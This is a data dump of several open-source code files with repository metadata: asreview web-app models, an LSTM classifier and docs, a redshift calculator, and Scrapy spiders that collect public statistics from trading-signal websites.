setFilterQuery={setHistoryFilterQuery}\n setLabel={setHistoryLabel}\n />\n }\n />\n )}\n\n {/* Team */}\n {isSuccess && authenticated && !data?.projectNeedsUpgrade && (\n <Route\n path=\"team\"\n element={\n <TeamPage\n isOwner={isOwner}\n mobileScreen={props.mobileScreen}\n mode={data?.mode}\n />\n }\n />\n )}\n\n {/* Export */}\n {isSuccess && !data?.projectNeedsUpgrade && (\n <Route\n path=\"export\"\n element={\n <ExportPage\n info={data}\n isSimulating={isSimulating}\n mobileScreen={props.mobileScreen}\n />\n }\n />\n )}\n\n {/* Details */}\n {isSuccess && !data?.projectNeedsUpgrade && (\n <Route\n path=\"details\"\n element={\n <DetailsPage\n info={data}\n isSimulating={isSimulating}\n mobileScreen={props.mobileScreen}\n setHistoryFilterQuery={setHistoryFilterQuery}\n />\n }\n />\n )}\n\n {isSuccess && <Route path=\"*\" element={<RouteNotFound />} />}\n </Routes>\n </Box>\n <DialogErrorHandler\n isError={returnError()[2]}\n error={returnError()[1]}\n queryKey={returnError()[0]}\n />\n </Root>\n );\n};\n\nexport default connect(null, mapDispatchToProps)(ProjectPage);\n" }, { "alpha_fraction": 0.6484317779541016, "alphanum_fraction": 0.6703136563301086, "avg_line_length": 31.571428298950195, "blob_id": "93e55e8ca22471922df557daea1e5a6381af4775", "content_id": "ac9c1cf9b979d17ecaa67fc7e8ae279991afb7d4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1371, "license_type": "permissive", "max_line_length": 103, "num_lines": 42, "path": "/tests/test_models.sh", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "\nDATASET=\"van_de_schoot_2017\"\n\nQUERY_STRATEGIES=('max_random' 'max_uncertainty' 'max' 'uncertainty' 'random')\n# ('max_random' 'max_uncertainty' 'max' 'uncertainty' 'random' 'cluster')\n\nfor qs in \"${QUERY_STRATEGIES[@]}\"\ndo\n asreview simulate benchmark:${DATASET} -q $qs --seed 535 --init_seed 535 -s ${DATASET}_${qs}.asreview\n asreview plot recall ${DATASET}_${qs}.asreview -o ${DATASET}_${qs}_recall.png\ndone\n\n\n\nBALANCE_STRATEGIES=('double' 'simple' 
'undersample')\n\nfor bs in \"${BALANCE_STRATEGIES[@]}\"\ndo\n asreview simulate benchmark:${DATASET} -b $bs --seed 535 --init_seed 535 -s ${DATASET}_${bs}.asreview\n asreview plot recall ${DATASET}_${bs}.asreview -o ${DATASET}_${bs}_recall.png\ndone\n\n\n\nMODELS=('logistic' 'nb' 'rf' 'svm')\n# MODELS=('logistic' 'lstm-base' 'lstm-pool' 'nb' 'nn-2-layer' 'rf' 'svm')\n\nfor m in \"${MODELS[@]}\"\ndo\n asreview simulate benchmark:${DATASET} -m $m --seed 535 --init_seed 535 -s ${DATASET}_${m}.asreview\n asreview plot recall ${DATASET}_${m}.asreview -o ${DATASET}_${m}_recall.png\ndone\n\n\n\nFEATURE_STRATEGIES=('tfidf')\n# FEATURE_STRATEGIES=('doc2vec' 'embedding-idf' 'embedding-lstm' 'sbert' 'tfidf')\n\nfor fs in \"${FEATURE_STRATEGIES[@]}\"\ndo\n asreview simulate benchmark:${DATASET} -e $fs --seed 535 --init_seed 535 -s ${DATASET}_${fs}.asreview\n asreview plot recall ${DATASET}_${fs}.asreview -o ${DATASET}_${fs}_recall.png\ndone\n\n\n" }, { "alpha_fraction": 0.6326595544815063, "alphanum_fraction": 0.637951135635376, "avg_line_length": 32.15438461303711, "blob_id": "7a45d72eab2160ed399240060ed724e6cbc0e033", "content_id": "0cffdee1f4a45ac2a4bda5fb1c3513fb86b92bec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9449, "license_type": "permissive", "max_line_length": 89, "num_lines": 285, "path": "/asreview/webapp/authentication/models.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime as dt\nimport re\nfrom pathlib import Path\n\nfrom flask_login import UserMixin\nfrom itsdangerous import URLSafeTimedSerializer\nfrom sqlalchemy import Boolean\nfrom sqlalchemy import Column\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import String\nfrom sqlalchemy import UniqueConstraint\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm import validates\nfrom werkzeug.security import check_password_hash\nfrom werkzeug.security import generate_password_hash\n\nimport asreview.utils as utils\nfrom asreview.webapp import DB\n\nPASSWORD_REGEX = (\n r\"^(?=.*[A-Za-z])(?=.*\\d)(?=.*[@$!%*?&#])[A-Za-z\\d@$!%*?&#]{8,}$\" # noqa\n)\nEMAIL_REGEX = r\"\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,7}\\b\"\n\n\nclass User(UserMixin, DB.Model):\n \"\"\"The User model for user accounts.\"\"\"\n\n __tablename__ = \"users\"\n id = Column(Integer, primary_key=True)\n identifier = Column(String(100), nullable=False, unique=True)\n origin = Column(String(100), nullable=False)\n email = Column(String(100), unique=True)\n name = Column(String(100))\n affiliation = Column(String(100))\n hashed_password = Column(String(100))\n confirmed = Column(Boolean)\n public = Column(Boolean)\n token = Column(String(50))\n token_created_at = Column(DateTime)\n\n projects = relationship(\"Project\", back_populates=\"owner\", 
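# the \"all, delete\" cascade removes a user's owned projects together with the user\n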
cascade=\"all, delete\")\n\n involved_in = relationship(\n \"Project\", secondary=\"collaborations\", back_populates=\"collaborators\"\n )\n\n pending_invitations = relationship(\n \"Project\",\n secondary=\"collaboration_invitations\",\n back_populates=\"pending_invitations\",\n )\n\n @validates(\"identifier\")\n def validate_identifier(self, _key, identifier):\n if not bool(identifier):\n raise ValueError(\"Identifier is required\")\n return identifier\n\n @validates(\"origin\")\n def validate_origin(self, _key, origin):\n if not bool(origin):\n raise ValueError(\"Origin is required\")\n return origin\n\n @validates(\"name\")\n def validate_name(self, _key, name):\n if not bool(name):\n raise ValueError(\"Name is required\")\n elif len(name) < 3:\n raise ValueError(\"Name must contain more than 2 characters\")\n return name\n\n @validates(\"email\")\n def validate_email(self, key, email):\n if key == \"email\" and self.origin == \"asreview\":\n if bool(email) is False:\n raise ValueError(\"Email is required when origin is 'asreview'\")\n elif not User.valid_email(email):\n raise ValueError(f\"Email address '{email}' is not valid\")\n return email\n\n def __init__(\n self,\n identifier,\n origin=\"asreview\",\n email=None,\n name=None,\n affiliation=None,\n password=None,\n confirmed=False,\n public=True,\n ):\n self.identifier = identifier\n self.origin = origin\n self.email = email\n self.name = name\n self.affiliation = affiliation\n if self.origin == \"asreview\":\n self.hashed_password = User.create_password_hash(password)\n self.confirmed = confirmed\n self.public = public\n\n def update_profile(self, email, name, affiliation, password=None, public=True):\n self.email = email\n self.name = name\n self.affiliation = affiliation\n if self.origin == \"asreview\" and password is not None:\n self.hashed_password = User.create_password_hash(password)\n self.public = public\n\n return self\n\n def reset_password(self, new_password):\n if self.origin == \"asreview\":\n self.hashed_password = User.create_password_hash(new_password)\n # reset token\n self.token = None\n self.token_created_at = None\n return self\n\n def set_token_data(self, secret, salt):\n \"\"\"Set token data (used in email verification after\n init, and for forgot-password\"\"\"\n token, token_created_at = User.generate_token_data(secret, salt, self.email)\n self.token = token\n self.token_created_at = token_created_at\n return self\n\n def verify_password(self, password):\n \"\"\"Verify password\"\"\"\n if bool(self.hashed_password):\n return check_password_hash(self.hashed_password, password)\n else:\n return False\n\n def get_name(self):\n \"\"\"Get name-ish thing from user account\"\"\"\n name = self.name or self.email\n return name\n\n def summarize(self):\n \"\"\"Summarize user account in frontend data packet\"\"\"\n return {\"id\": self.id, \"name\": self.get_name(), \"email\": self.email}\n\n def confirm_user(self):\n \"\"\"This function confirms a user by setting the confirmed\n field to True and removes the token data\"\"\"\n self.confirmed = True\n self.token = None\n self.token_created_at = None\n return self\n\n def token_valid(self, provided_token, max_hours=24):\n \"\"\"Checks whether provided token is correct and still valid\"\"\"\n # there must be a token and a timestamp\n if bool(self.token) and bool(self.token_created_at):\n # what is now\n now = dt.datetime.utcnow()\n # get time-difference in hours\n diff = (now - self.token_created_at).total_seconds()\n # return if token is correct and we are still 
before deadline\n return self.token == provided_token and diff <= max_hours * 3600\n else:\n return False\n\n @classmethod\n def generate_token_data(cls, secret, salt, email):\n \"\"\"Generate a token for verification by email\"\"\"\n serializer = URLSafeTimedSerializer(secret)\n token = serializer.dumps(email, salt=salt)\n created_at = dt.datetime.utcnow()\n return token, created_at\n\n @classmethod\n def valid_password(cls, password):\n return re.fullmatch(PASSWORD_REGEX, password)\n\n @classmethod\n def valid_email(cls, email):\n return re.fullmatch(EMAIL_REGEX, email)\n\n @classmethod\n def create_password_hash(cls, password):\n if bool(password) and User.valid_password(password):\n return generate_password_hash(password)\n else:\n raise ValueError(f'Password \"{password}\" does not meet requirements')\n\n def __repr__(self):\n return f\"<User {self.email!r}, id: {self.id}>\"\n\n\nclass Collaboration(DB.Model):\n __tablename__ = \"collaborations\"\n id = Column(Integer, primary_key=True)\n user_id = Column(\n Integer,\n ForeignKey(\"users.id\", ondelete=\"cascade\"),\n nullable=False\n )\n project_id = Column(\n Integer,\n ForeignKey(\"projects.id\", ondelete=\"cascade\"),\n nullable=False\n )\n # make sure we have unique records in this table\n __table_args__ = (UniqueConstraint(\"project_id\", \"user_id\", name=\"unique_records\"),)\n\n def __repr__(self):\n return f\"<Collaboration project:{self.project_id} user:{self.user_id}>\"\n\n\nclass Project(DB.Model):\n \"\"\"Project table\"\"\"\n\n __tablename__ = \"projects\"\n id = Column(Integer, primary_key=True)\n project_id = Column(String(250), nullable=False, unique=True)\n owner_id = Column(Integer, ForeignKey(User.id), nullable=False)\n owner = relationship(\"User\", back_populates=\"projects\")\n\n # do not delete cascade: we don't want to\n # lose users, only collaborations\n collaborators = relationship(\n \"User\", secondary=\"collaborations\", back_populates=\"involved_in\"\n )\n pending_invitations = relationship(\n \"User\",\n secondary=\"collaboration_invitations\",\n back_populates=\"pending_invitations\",\n )\n\n @property\n def project_path(self):\n \"\"\"Returns full project path\"\"\"\n return Path(utils.asreview_path(), self.project_id)\n\n @property\n def folder(self):\n \"\"\"Returns foldername (which is the project_id)\"\"\"\n return self.project_id\n\n def __repr__(self):\n return f\"<Project id: {self.project_id}, owner_id: {self.owner_id}>\"\n\n\nclass CollaborationInvitation(DB.Model):\n \"\"\"Colleboration invitations\"\"\"\n\n __tablename__ = \"collaboration_invitations\"\n id = Column(Integer, primary_key=True)\n project_id = Column(\n Integer,\n ForeignKey(\"projects.id\", ondelete=\"cascade\"),\n nullable=False\n )\n user_id = Column(\n Integer,\n ForeignKey(\"users.id\", ondelete=\"cascade\"),\n nullable=False\n )\n # make sure we have unique records in this table\n __table_args__ = (UniqueConstraint(\"project_id\", \"user_id\", name=\"unique_records\"),)\n\n def __repr__(self):\n pid = self.project_id\n uid = self.user_id\n return f\"<CollaborationInvitation project:{pid} user:{uid}>\"\n" }, { "alpha_fraction": 0.7997266054153442, "alphanum_fraction": 0.8092959523200989, "avg_line_length": 44.71875, "blob_id": "d336b4012276a5f67291a06ecbf27006f5bdab29", "content_id": "56ea7cabd85912c2841808233cd9967b7a82c6ed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1463, "license_type": "permissive", "max_line_length": 78, "num_lines": 32, 
"path": "/asreview/models/feature_extraction/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.models.feature_extraction.doc2vec import Doc2Vec\nfrom asreview.models.feature_extraction.embedding_idf import EmbeddingIdf\nfrom asreview.models.feature_extraction.embedding_lstm import EmbeddingLSTM\nfrom asreview.models.feature_extraction.sbert import SBERT\nfrom asreview.models.feature_extraction.tfidf import Tfidf\nfrom asreview.models.feature_extraction.utils import get_feature_class\nfrom asreview.models.feature_extraction.utils import get_feature_model\nfrom asreview.models.feature_extraction.utils import list_feature_extraction\n\n\"\"\"Feature extraction converts texts into features.\n\nFeature extraction is the process of converting a list of texts into some kind\nof feature matrix.\n\nThere are several feature extraction algorithms available. In configuration\nfiles, parameters are found under the section ``[feature_param]``.\n\n\"\"\"\n" }, { "alpha_fraction": 0.6107178926467896, "alphanum_fraction": 0.6215874552726746, "avg_line_length": 28.969696044921875, "blob_id": "29146195cef3c5f7935bb70d13a0c83b6e5bbba7", "content_id": "a88779a2244139e066cef2245c96531a1e905055", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7912, "license_type": "permissive", "max_line_length": 80, "num_lines": 264, "path": "/asreview/models/classifiers/lstm_base.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\n\ntry:\n import tensorflow as tf\n from tensorflow.keras import optimizers\n from tensorflow.keras.layers import LSTM\n from tensorflow.keras.layers import Dense\n from tensorflow.keras.layers import Embedding\n from tensorflow.keras.models import Sequential\nexcept ImportError:\n TF_AVAILABLE = False\nelse:\n TF_AVAILABLE = True\n try:\n tf.logging.set_verbosity(tf.logging.ERROR)\n except AttributeError:\n logging.getLogger(\"tensorflow\").setLevel(logging.ERROR)\n\nimport numpy as np\nimport scipy\n\nfrom asreview.models.classifiers.base import BaseTrainClassifier\nfrom asreview.models.classifiers.utils import _set_class_weight\n\n\ndef _check_tensorflow():\n if not TF_AVAILABLE:\n raise ImportError(\"Install tensorflow package to use\" \" LSTM-base.\")\n\n\nclass LSTMBaseClassifier(BaseTrainClassifier):\n \"\"\"LSTM-base classifier (``lstm-base``).\n\n LSTM model that consists of an embedding layer, LSTM layer with one\n output, dense layer, and a single sigmoid output node. Use the\n :class:`asreview.models.feature_extraction.EmbeddingLSTM` feature extraction\n method. Currently not so well optimized and slow.\n\n .. note::\n\n This model requires ``tensorflow`` to be installed. 
Use ``pip install\n tensorflow`` or install all optional ASReview dependencies with ``pip\n install asreview[all]``\n\n Arguments\n ---------\n embedding_matrix: numpy.ndarray\n Embedding matrix to use with LSTM model.\n backwards: bool\n Whether to have a forward or backward LSTM.\n dropout: float\n Value in [0, 1.0) that gives the dropout and recurrent\n dropout rate for the LSTM model.\n optimizer: str\n Optimizer to use.\n lstm_out_width: int\n Output width of the LSTM.\n learn_rate: float\n Learn rate multiplier of default learning rate.\n dense_width: int\n Size of the dense layer of the model.\n verbose: int\n Verbosity.\n batch_size: int\n Size of the batch size for the LSTM model.\n epochs: int\n Number of epochs to train the LSTM model.\n shuffle: bool\n Whether to shuffle the data before starting to train.\n class_weight: float\n Class weight for the included papers.\n \"\"\"\n\n name = \"lstm-base\"\n label = \"LSTM classic\"\n\n def __init__(\n self,\n embedding_matrix=None,\n backwards=True,\n dropout=0.4,\n optimizer=\"rmsprop\",\n lstm_out_width=20,\n learn_rate=1.0,\n dense_width=128,\n verbose=0,\n batch_size=32,\n epochs=35,\n shuffle=False,\n class_weight=30.0,\n ):\n \"\"\"Initialize the LSTM base model\"\"\"\n super(LSTMBaseClassifier, self).__init__()\n self.embedding_matrix = embedding_matrix\n self.backwards = backwards\n self.dropout = dropout\n self.optimizer = optimizer\n self.lstm_out_width = lstm_out_width\n self.learn_rate = learn_rate\n self.dense_width = dense_width\n self.verbose = verbose\n self.batch_size = batch_size\n self.epochs = epochs\n self.shuffle = shuffle\n self.class_weight = class_weight\n self._model = None\n self.sequence_length = None\n\n def fit(self, X, y):\n # check is tensorflow is available\n _check_tensorflow()\n\n if scipy.sparse.isspmatrix(X):\n X = X.toarray()\n\n sequence_length = X.shape[1]\n if self._model is None or sequence_length != self.sequence_length:\n self.sequence_length = sequence_length\n self._model = _create_lstm_base_model(\n embedding_matrix=self.embedding_matrix,\n backwards=self.backwards,\n dropout=self.dropout,\n optimizer=self.optimizer,\n max_sequence_length=self.sequence_length,\n lstm_out_width=self.lstm_out_width,\n dense_width=self.dense_width,\n learn_rate=self.learn_rate,\n verbose=self.verbose,\n )\n\n self._model.fit(\n X,\n y,\n batch_size=self.batch_size,\n epochs=self.epochs,\n shuffle=self.shuffle,\n class_weight=_set_class_weight(self.class_weight),\n verbose=self.verbose,\n )\n\n def predict_proba(self, X):\n if scipy.sparse.issparse(X):\n X = X.toarray()\n pos_pred = self._model.predict(X, verbose=self.verbose)\n neg_pred = 1 - pos_pred\n return np.hstack([neg_pred, pos_pred])\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n hyper_choices = {}\n hyper_space = {\n \"mdl_dropout\": hp.uniform(\"mdl_dropout\", 0, 0.9),\n \"mdl_lstm_out_width\": hp.quniform(\"mdl_lstm_out_width\", 1, 50, 1),\n \"mdl_dense_width\": hp.quniform(\"mdl_dense_width\", 1, 200, 1),\n \"mdl_learn_rate_mult\": hp.lognormal(\"mdl_learn_rate_mult\", 0, 1),\n }\n return hyper_space, hyper_choices\n\n @property\n def default_param(self):\n defaults = super(LSTMBaseClassifier, self).default_param\n defaults.pop(\"embedding_matrix\")\n return defaults\n\n\ndef _create_lstm_base_model(\n embedding_matrix,\n backwards=True,\n dropout=0.4,\n optimizer=\"rmsprop\",\n max_sequence_length=1000,\n lstm_out_width=20,\n dense_width=128,\n learn_rate=1.0,\n verbose=1,\n):\n \"\"\"Return callable lstm model.\n Returns\n 
-------\n callable:\n A function that return the Keras Sklearn model when\n called.\n\n \"\"\"\n\n # check is tensorflow is available\n _check_tensorflow()\n\n model = Sequential()\n\n # add first embedding layer with pretrained wikipedia weights\n model.add(\n Embedding(\n embedding_matrix.shape[0],\n embedding_matrix.shape[1],\n weights=[embedding_matrix],\n input_length=max_sequence_length,\n trainable=False,\n )\n )\n\n # add LSTM layer\n model.add(\n LSTM(\n lstm_out_width,\n input_shape=(max_sequence_length,),\n go_backwards=backwards,\n dropout=dropout,\n recurrent_dropout=dropout,\n )\n )\n\n # add Dense layer with relu activation\n model.add(\n Dense(\n dense_width,\n activation=\"relu\",\n )\n )\n\n # add Dense layer\n model.add(Dense(1, activation=\"sigmoid\"))\n\n optimizer_fn = _get_optimizer(optimizer, learn_rate)\n\n # Compile model\n model.compile(\n loss=\"binary_crossentropy\", optimizer=optimizer_fn, metrics=[\"acc\"]\n )\n\n if verbose >= 1:\n model.summary(verbose=verbose)\n\n return model\n\n\ndef _get_optimizer(optimizer, lr_mult=1.0):\n \"Get optimizer with correct learning rate.\"\n if optimizer == \"sgd\":\n return optimizers.SGD(learning_rate=0.01 * lr_mult)\n elif optimizer == \"rmsprop\":\n return optimizers.RMSprop(learning_rate=0.001 * lr_mult)\n elif optimizer == \"adagrad\":\n return optimizers.Adagrad(learning_rate=0.01 * lr_mult)\n elif optimizer == \"adam\":\n return optimizers.Adam(learning_rate=0.001 * lr_mult)\n elif optimizer == \"nadam\":\n return optimizers.Nadam(learning_rate=0.002 * lr_mult)\n raise NotImplementedError\n" }, { "alpha_fraction": 0.6251012086868286, "alphanum_fraction": 0.6299595236778259, "avg_line_length": 12.722222328186035, "blob_id": "b6fcf148b5f3c96c78a55ac313445ba1215daffa", "content_id": "e81ce06300a7756d63e1a95da3d6dab5ba6a73b3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1235, "license_type": "permissive", "max_line_length": 74, "num_lines": 90, "path": "/docs/source/index.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "ASReview LAB: Active learning for Systematic Reviews\n====================================================\n\nWelcome to the ASReview LAB Documentation!\n\n\n.. toctree::\n :maxdepth: 1\n\n about\n\n research\n\n contribute\n\nQuestions can be asked on `GitHub Discussions\n<https://github.com/asreview/asreview/discussions>`__. For bug reports and\nfeature requests, please submit an issue on `GitHub\n<https://github.com/asreview/asreview/issues/new/choose>`__.\n\n.. toctree::\n :maxdepth: 1\n :caption: Install and Upgrade\n\n installation\n\n start\n\n troubleshooting\n\n\n.. toctree::\n :maxdepth: 1\n :caption: Data\n\n data\n\n data_format\n\n data_labeled\n\n\n.. toctree::\n :maxdepth: 1\n :caption: Screening and Projects\n\n project_create\n\n screening\n\n progress\n\n manage\n\n extensions_overview\n\n.. toctree::\n :maxdepth: 1\n :caption: Simulation\n\n simulation_overview\n\n simulation_webapp\n\n simulation_cli\n\n simulation_results\n\n simulation_api_example\n\n.. 
toctree::\n :maxdepth: 1\n :caption: Development\n\n overview_development\n\n cli\n\n example_api_asreview_file\n\n extensions_dev\n\n reference\n\n\nIndices and tables\n------------------\n\n- :ref:`genindex`\n- :ref:`modindex`\n" }, { "alpha_fraction": 0.5691699385643005, "alphanum_fraction": 0.6561264991760254, "avg_line_length": 24.299999237060547, "blob_id": "ee4635d1b31bae448fe7d1d833ea92da939134f0", "content_id": "5863532ebcbf63183170b75e0cb499ed46fa85d2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 253, "license_type": "permissive", "max_line_length": 59, "num_lines": 10, "path": "/asreview/webapp/src/icons/PlusIcon.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport SvgIcon from \"@mui/material/SvgIcon\";\n\nexport default function PlusIcon(props) {\n return (\n <SvgIcon {...props} viewBox=\"0 0 24 24\">\n <path d=\"M19 13h-6v6h-2v-6H5v-2h6V5h2v6h6v2z\"></path>\n </SvgIcon>\n );\n}\n" } ]
201
cwhayes/redshift
https://github.com/cwhayes/redshift
b1e349b383f0b8b0ce95e261b022af831f88f6c6
572fbd9f4cae66ad3d2985f0fde56d8516f6c0de
5cc7cc40f33a33d71a04e07b0252344e9cedc1f2
refs/heads/master
2020-05-25T17:27:45.589541
2019-05-21T20:28:04
2019-05-21T20:28:04
187,908,556
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.584269642829895, "alphanum_fraction": 0.5941011309623718, "avg_line_length": 18.72222137451172, "blob_id": "1acb3dec93d2c8d22c35f60f0a48eaa069a40891", "content_id": "7869e89498c7052a7f9823d285ec67b9daf22e5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 712, "license_type": "no_license", "max_line_length": 65, "num_lines": 36, "path": "/redshift.py", "repo_name": "cwhayes/redshift", "src_encoding": "UTF-8", "text": "from __future__ import print_function, division\nimport numpy as np\n\nwhile True:\n\n\tto_calc = raw_input('What would you like to calculate? (z/d): ')\n\n\tif (to_calc == 'd'):\n\t\tz = float(raw_input('Value of z: '))\n\n\t\tH = 65\n\t\tc = 3 * 10**5\n\t\n\t\tv = z * c\n\n\t\td = v / H\n\n\t\tprint('The distance is', d, 'Mpc.')\n\n\telif (to_calc == 'z'):\n\t\torig = float(raw_input('Original wavelength: '))\n\t\tnew = float(raw_input('Shifted wavelength: '))\n\t\tdelta = new - orig\n\t\tz = np.abs(delta / orig)\n\t\n\t\tif (delta > 0):\n\t\t\tprint('Your object has a redshift of', z)\n\t\telse:\n\t\t\tprint('Your object has a blueshift of', z)\n\n\ttocontinue = raw_input('Would you like to do another? (y/n) ')\n\n\tif (tocontinue == 'y'):\n\t\tcontinue\n\telse:\n\t\tbreak\n\t\n" } ]
1
hyunsub-h/SocialTrading
https://github.com/hyunsub-h/SocialTrading
e7a185068d87f4762100336b4cd4f9273e35dbe0
fa292ea5fba6609fbc5b529011c3bc1fd22a1657
439118dcfda6b283ac4daab209165fc51790339f
refs/heads/master
2018-03-26T16:57:31.714655
2017-06-01T21:09:02
2017-06-01T21:09:02
87,149,050
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7931034564971924, "alphanum_fraction": 0.7931034564971924, "avg_line_length": 13.666666984558105, "blob_id": "03972f9597340ac84ddec1fa1e56835e70cf2ef6", "content_id": "db9f378afb9aa1b998072a510fad1ed719967a54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/README.md", "repo_name": "hyunsub-h/SocialTrading", "src_encoding": "UTF-8", "text": "# SocialTrading\n\nScrape data from social trade platforms.\n\n## Dependency\npython: Scrapy" }, { "alpha_fraction": 0.6369160413742065, "alphanum_fraction": 0.6433725953102112, "avg_line_length": 37.130435943603516, "blob_id": "d6955c328fcceb520d1e35abe28f64baaf2e2bfe", "content_id": "7f4d26c074b70b7a17b6ede9c723722db93a7443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2633, "license_type": "no_license", "max_line_length": 174, "num_lines": 69, "path": "/socialtrading/socialtrading/spiders/mql_spider.py", "repo_name": "hyunsub-h/SocialTrading", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nuser_data = {}\n\ndef none_or_empty(text):\n return str(text) if text != None else \"\"\n\nclass TraderSpider(scrapy.Spider):\n name = \"mql_spider\"\n\n\n def start_requests(self):\n urls = [\n 'https://www.mql5.com/en/signals/mt4', \n 'https://www.mql5.com/en/signals/mt5',\n# 'https://www.mql5.com/en/signals/257977',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.generate_signal_list_page_from_main_page)\n\n with open(\"result.json\", 'w') as f:\n json.dump(user_data, f)\n\n def generate_signal_list_page_from_main_page(self, response):\n page_length = int(response.css(\"span.paginatorEx\").xpath(\"descendant::a\")[-1].xpath(\"text()\").extract_first())\n for index in xrange(1, page_length + 1):\n url = response.url + \"/page\" + str(index)\n yield scrapy.Request(url=url, callback=self.generate_signal_page_from_signal_list)\n\n def generate_signal_page_from_signal_list(self, response):\n for signal_element in response.css(\"div.signal\"):\n url = signal_element.xpath(\"descendant::a [@href]\")[1].xpath(\"@href\").extract_first()\n yield scrapy.Request(url=url, callback=self.parse_signal_page) \n\n def parse_signal_page(self, response):\n trading_data = {}\n\n user_name = response.css('h1.title-min').xpath(\"descendant::a\").xpath(\"text()\").extract_first()\n \n trading_data_element_list = response.css('div.signalsTradeData')\n\n for trading_data_element in trading_data_element_list:\n for metric_element in trading_data_element.xpath(\"descendant::div [@title]\"):\n metric_name = metric_element.xpath(\"text()\").extract_first().strip().strip(\":\")\n if metric_name == \"\":\n # growth\n metric_name = metric_element.xpath(\"descendant::text()\").extract_first()\n value = metric_element.xpath(\"descendant::i/text()\").extract_first()\n else:\n value = none_or_empty(metric_element.xpath(\"descendant::i/text()\").extract_first()) + none_or_empty(metric_element.xpath(\"descendant::span/text()\").extract_first())\n\n trading_data[metric_name] = value\n\n user_data[user_name] = trading_data\n\n\"\"\"\n def parse(self, response):\n for quote in response.css(\"div.quote\"):\n yield {\n 'text': quote.css(\"span.text::text\").extract_first(),\n 'author': quote.css(\"small.author::text\").extract_first(),\n 'tags': quote.css(\"div.tags > a.tag::text\").extract()\n }\n\n next_page_url = 
response.css(\"li.next > a::attr(href)\").extract_first()\n if next_page_url is not None:\n yield scrapy.Request(response.urljoin(next_page_url))\n\"\"\"\n\n\n" }, { "alpha_fraction": 0.6115702390670776, "alphanum_fraction": 0.6136363744735718, "avg_line_length": 26.600000381469727, "blob_id": "786c36c295d3f25f114c56b9e53a29e9729b2d07", "content_id": "b26408b86dc6fae6720da445044026195ed9d31c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 968, "license_type": "no_license", "max_line_length": 75, "num_lines": 35, "path": "/socialtrading/socialtrading/spiders/zulu_spider.py", "repo_name": "hyunsub-h/SocialTrading", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass TraderSpider(scrapy.Spider):\n name = \"zulu_spider\"\n\n\n def start_requests(self):\n urls = [\n 'https://socialtrading.zulutrade.com/traders#forex',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n\n def parse(self, response):\n page = response.url.split(\"/\")[-2]\n filename = 'traderss-%s.html' % page\n with open(filename, 'wb') as f:\n f.write(response.body)\n self.log('Saved file %s' % filename)\n\"\"\"\n def parse(self, response):\n for quote in response.css(\"div.quote\"):\n yield {\n 'text': quote.css(\"span.text::text\").extract_first(),\n 'author': quote.css(\"small.author::text\").extract_first(),\n 'tags': quote.css(\"div.tags > a.tag::text\").extract()\n }\n\n next_page_url = response.css(\"li.next > a::attr(href)\").extract_first()\n if next_page_url is not None:\n yield scrapy.Request(response.urljoin(next_page_url))\n\"\"\"\n\n\n" }, { "alpha_fraction": 0.6337078809738159, 